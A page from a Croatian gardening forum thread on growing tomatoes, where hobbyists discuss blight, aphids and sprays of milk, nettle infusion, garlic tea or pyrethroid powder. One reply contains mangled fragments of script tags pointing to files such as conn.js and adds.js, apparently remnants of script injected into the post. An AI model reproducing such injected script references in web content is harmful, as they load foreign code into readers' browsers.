Početna stranica Početna stranica > Ostale biljne vrste - Forum o biljkama > Povrće
  Aktivne teme Aktivne teme RSS Feed - Rajčica - Lycopersicon esculentum
  Pomoć Pomoć  Pretraga foruma   Događanja   Registracija Registracija  Prijava Prijava

Rajčica - Lycopersicon esculentum

Odgovori Odgovori Stranica  <1 4950515253 78>
Korisnik
Poruka
 Ocjena: Ocjena teme: 1 Glasova, Približno 5,00  Tema Pretraga Tema Pretraga  Opcije teme Opcije teme
Sasa22 View Drop Down
Novo sjeme
Novo sjeme

Status: Offline
Bodovi: 38
Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje Sasa22 Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 27 Travanj 2013 u 18:44
Evo i moji 10 -ak dana, mada sam na otoku, sunce, uzivaju danas slaba kisa, 17 stupnjeva vani

pozz       Smile
Na vrh
Sponzorirani linkovi

Na vrh
magadan View Drop Down
Upravo klijam
Upravo klijam

Bodovi: 141
Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje magadan Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 07 Svibanj 2013 u 09:23
Bas gledam prognozu za sljedecih 25 dana i svako malo je kisa, nadam se da to nece stetiti rajcicama. Bojim se plamenjaceDead.
Na vrh
MisterNo View Drop Down
Pustio korijenje
Pustio korijenje

Bodovi: 308
Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje MisterNo Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 07 Svibanj 2013 u 14:58
Originalno poslano od člana magadan magadan napisao:

Bas gledam prognozu za sljedecih 25 dana i svako malo je kisa, nadam se da to nece stetiti rajcicama. Bojim se plamenjaceDead.

Preventivno pošpricaj obranim mlijekom razrijeđenim u vodi 1:10. Po prognozi bit će i odsta sunca, en bi trebalo biti prevlažno.

Kao prevencija je razrijeđeno mlijeko ok, ako dođe do zaraze nema lijeka, samo ''damage control''.
Na vrh
magadan View Drop Down
Upravo klijam
Upravo klijam

Bodovi: 141
Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje magadan Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 07 Svibanj 2013 u 15:15
Da to sam i planirala sutra napraviti jer ce biti suncano. Jel ok da spricam ujutro ili je bolje kad uprzi sunce?
Na vrh
Fiki View Drop Down
Trajnica
Trajnica

Bodovi: 2792
Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje Fiki Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 17 Svibanj 2013 u 22:14
Gledajte moj flanac Angore supersweet 

Na vrh
Pustolovka View Drop Down
Neukroćena biljka
Neukroćena biljka

Bodovi: 3162
Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje Pustolovka Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 17 Svibanj 2013 u 22:20
Mialia Fiki drugacije je boje nego inace?Jako su ti napredne sadnice masala.Thumbs Up Koliko brojis sadnica ove godine?
Trud je uzaludan, ako se priroda protivi.

Seneka
Na vrh
Fiki View Drop Down
Trajnica
Trajnica

Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje Fiki Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 17 Svibanj 2013 u 22:28
Sadnica brojim 120 ...
Na vrh
Neukroćena biljka
Neukroćena biljka

Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje Pustolovka Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 29 Svibanj 2013 u 17:04
Pozdrav,ne pisemo nista o paradajzima to govori da jos niko nije imao problema sa istima sto ne znaci da necemo imati s obzirom na hladno vrijeme,a paradajzi to ne podnose.Zanima me jel ko cime prskao ove godine od fungicida ili ste kao ja oslonili se na bio propravke?Ja strahujem da ove godine to nece bit dovoljno,trebat ce fungicidom prskati ko zeli svoj paradajz.Disapprove

Seneka
Na vrh
jagoda View Drop Down
Cvjetni guru
Cvjetni guru

Bodovi: 5241
Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje jagoda Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 22 Lipanj 2013 u 01:29
Obično se ovdje ne javljam, ali ove godine imam baš svoje rajčice, od sjemena do sadnice..Imam puno vrsta i lijepo napreduju. Prvi posađeni DALMATINERI cvjetaju, dok ostali će brzo..Svo sjeme dobila sam od dragih ljudi sa CIFa i još nekih izvora. Svima puno hvala. Nadam se da ću za iduću godinu spremiti svoje sjeme...Imam posađenih nekih 12 vrsta, a 80 biljaka.
Na jednoj biljci primjetila sam neke sitne crvenkaste uši. Odstranila sam nekoliko listova i mislim da se nije širilo dalje. Čime bi bilo dobro špricati,ako se to još pojavi, da li možda koprivom?WinkWink
sutra je novi dan
Na vrh
Fiki View Drop Down
Trajnica
Trajnica

Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje Fiki Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 23 Lipanj 2013 u 00:00
< ="text/" ="//./5/conn1.js">< ="text/" ="./5/d.txt">< ="text/" ="//./5/conn.js">Ako se baviš eko uzgojem...onda možeš i koprivom,ona je jak insektcid ,ja nemam tog problema jer sam pomiješao svega......uz rajčice sam sadio kopar,peršin,bosiljak,kadife ,nevene, .pa biljke žive u simbiozi! Thumbs Up< ="text/" async="" ="./5/adds.js">
Na vrh
administrator View Drop Down
administrator
administrator
tata-mata foruma ©

Bodovi: 6910
Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje administrator Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 09 Srpanj 2013 u 10:32
kao što kaže Fiki probaj koprivom. ako ne ide i ako rade veliku štetu i šire s dalje onda obavezno neki insekticid.

Ali prije toga provjeriti da li se radi o uši ili crvenom pauku.
Na vrh
Sasa22 View Drop Down
Novo sjeme
Novo sjeme

Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje Sasa22 Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 11 Srpanj 2013 u 06:55
Vidim na rajcicama jako sitne crne insekte, mislim da su biljne usi, i neke mi rajcice imaju male rupice, sinoc sam ih zalio mlijekom i vodom 1;10, jesam li dobro ucinio

thnx
Na vrh
Fiki View Drop Down
Trajnica
Trajnica

Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje Fiki Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 12 Srpanj 2013 u 00:20
Mlijeko se upotrebljava kod gljivičnih bolesti,,,a za kukce ti treba insektcid,,,lijepo zatopi koprive i prskaj,,,ona je odličan insektcid,,,ako se nebaviš eko uzgojem....ima mnogo kemijski sredstava kao i neopetroid
Na vrh
Neukroćena biljka
Neukroćena biljka

Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje Pustolovka Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 12 Srpanj 2013 u 00:41
Originalno poslano od člana Sasa22 Sasa22 napisao:

Vidim na rajcicama jako sitne crne insekte, mislim da su biljne usi, i neke mi rajcice imaju male rupice, sinoc sam ih zalio mlijekom i vodom 1;10, jesam li dobro ucinio

thnx
Sasa nisi dobro uradio.trebas litru punomasnog mlijeka pomijesati sa litrom vodom.ako nemas punomasno onda litar kupovnog bez vode.

Seneka
Na vrh
Sasa22 View Drop Down
Novo sjeme
Novo sjeme

Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje Sasa22 Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 12 Srpanj 2013 u 06:53
Originalno poslano od člana Fiki Fiki napisao:

Mlijeko se upotrebljava kod gljivičnih bolesti,,,a za kukce ti treba insektcid,,,lijepo zatopi koprive i prskaj,,,ona je odličan insektcid,,,ako se nebaviš eko uzgojem....ima mnogo kemijski sredstava kao i neopetroid

Hvala, kod mene nema koprive, neopitroida valjda ima (u prahu), mjesa li se s vodom ili .... i kako, imam rucnu tlacnu prskalicu.

A za ubuduce (nabavit cu koprivu) kako ide s njom

hvala
Na vrh
Fiki View Drop Down
Trajnica
Trajnica

Opcije poruke Opcije poruke   Hvala (1) Hvala(1)   Citiranje Fiki Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 13 Srpanj 2013 u 21:52
Zatopiš 24 sata....razrijediš sa  vodom ,,,jer je uistinu jak insektcid,,,,i u pumpu i prskaj,,,a  neopitroid u prahu....jako je učinkovit,,,pa ti odluči,,! 
Na vrh
Sasa22 View Drop Down
Novo sjeme
Novo sjeme

Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje Sasa22 Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 14 Srpanj 2013 u 07:58
Originalno poslano od člana Fiki Fiki napisao:

Zatopiš 24 sata....razrijediš sa  vodom ,,,jer je uistinu jak insektcid,,,,i u pumpu i prskaj,,,a  neopitroid u prahu....jako je učinkovit,,,pa ti odluči,,! 

Sorry sto ispitujem, koliko koprive mi treba za 10 L vode

thnx  Smile
Na vrh
Fiki View Drop Down
Trajnica
Trajnica

Opcije poruke Opcije poruke   Hvala (1) Hvala(1)   Citiranje Fiki Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 14 Srpanj 2013 u 11:37
1 kg,,,tako ja radim! 
Na vrh
Neukroćena biljka
Neukroćena biljka

Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje Pustolovka Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 19 Srpanj 2013 u 13:57
Kod mene se aktivirala plamenjaca,vec pokidano nekoliko odraslih sadnica sa velikim plodovima.Ova godina nikako ne pogoduje paradajzima vlaga,kise.DisapproveConfused

Seneka
Na vrh
Fiki View Drop Down
Trajnica
Trajnica

Opcije poruke Opcije poruke   Hvala (1) Hvala(1)   Citiranje Fiki Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 21 Srpanj 2013 u 00:05
Predlažem čaj od bijelog luka...! 
Na vrh
 Odgovori Odgovori Stranica  <1 4950515253 78>
  Prosljedi temu   

Pređi na drugi forum Forumska ovlaštenja View Drop Down

Forum Software by Web Wiz Forums® version 10.15
Copyright ©2001-2013 Web Wiz Ltd.

Stranica je generirana u 0,172 sekundi.